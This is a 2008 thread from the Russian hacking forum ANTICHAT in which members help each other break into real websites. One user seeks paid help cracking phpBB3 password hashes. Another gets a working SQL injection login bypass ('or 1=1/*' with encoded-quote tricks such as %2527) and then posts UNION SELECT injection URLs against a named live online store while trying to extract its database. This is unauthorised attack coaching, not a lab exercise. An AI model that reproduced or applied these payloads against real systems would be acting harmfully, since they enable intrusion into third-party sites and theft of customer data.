HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 27.11.2008, 15:05
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами: 10313606

Репутация: 1327
По умолчанию

или md5(phpbb3), что скорее всего
 
Ответить с цитированием

  #2  
Старый 27.11.2008, 15:11
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
С нами: 10198073

Репутация: 354
По умолчанию

Значит PasswordsPro мне в руки и долгие годы ожидания и терпимости, или есть иные варианты? Сервисы не берут, в пассвордспро я такого типа хешей вообще не обнаружил, как md5(phpbb3)
Кто может помочь? Об оплате договоримся
 
Ответить с цитированием

  #3  
Старый 27.11.2008, 15:16
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами: 10313606

Репутация: 1327
По умолчанию

http://forum.xakep.ru/m_1107118/tm.htm и еще вот тут можно почитать
 
Ответить с цитированием

  #4  
Старый 27.11.2008, 15:18
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
С нами: 10198073

Репутация: 354
По умолчанию

Спасибо. Уже вникаю =)
 
Ответить с цитированием

  #5  
Старый 27.11.2008, 15:22
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
С нами: 9216251

Репутация: 30
По умолчанию

_Pantera_,
Ошибки свои понял.
Спасибо!
 
Ответить с цитированием

  #6  
Старый 27.11.2008, 22:12
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами: 9741777

Репутация: 100
По умолчанию

Пытаюсь авторизоватся по типу
emailass
Мыло не знаю, поэтому ввожу от балды. Кавычки фильтруются
Цитата:
SELECT * FROM t_customer WHERE (email='admin@admin.com\') AND (password='or 1=1--')
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 1
Как можно обойти фильтрацию и авторизоватся?
 
Ответить с цитированием

  #7  
Старый 27.11.2008, 22:30
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
С нами: 9875796

Репутация: 770
По умолчанию

Цитата:
Сообщение от Ershik  
Пытаюсь авторизоватся по типу
emailass
Мыло не знаю, поэтому ввожу от балды. Кавычки фильтруются


Как можно обойти фильтрацию и авторизоватся?
По всей видимости есть sql-инъекция, попробуй найти табличку юзеров/админов, там должно быть достаточно информации, чтобы пройти авторизацию ; )
 
Ответить с цитированием

  #8  
Старый 27.11.2008, 22:47
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами: 9741777

Репутация: 100
По умолчанию

По логике t_customer. Я поискал, иньекция только в авторизации.
и только в поле логина
 
Ответить с цитированием

  #9  
Старый 27.11.2008, 22:52
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

будет работать когда
Цитата:
SELECT * FROM t_customer WHERE (email='admin@admin.com' or 1=1/*) AND (password='')
обойти фильтр кавычки можна так: %27,%2527,` в разных случаях по разному, тоесть пример

mail:a@a.a%2527 or 1=1/*
pass:

Последний раз редактировалось sabe; 27.11.2008 в 22:54..
 
Ответить с цитированием

  #10  
Старый 28.11.2008, 01:09
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами: 9741777

Репутация: 100
По умолчанию

Понятно. еще вопрос.
__http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,3,4,5,6,7,8.9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36/*

почему, когда хочу узнать версию базы данных, выскакиет ошибка?
___http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,database(),4,5,6,7,8.9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.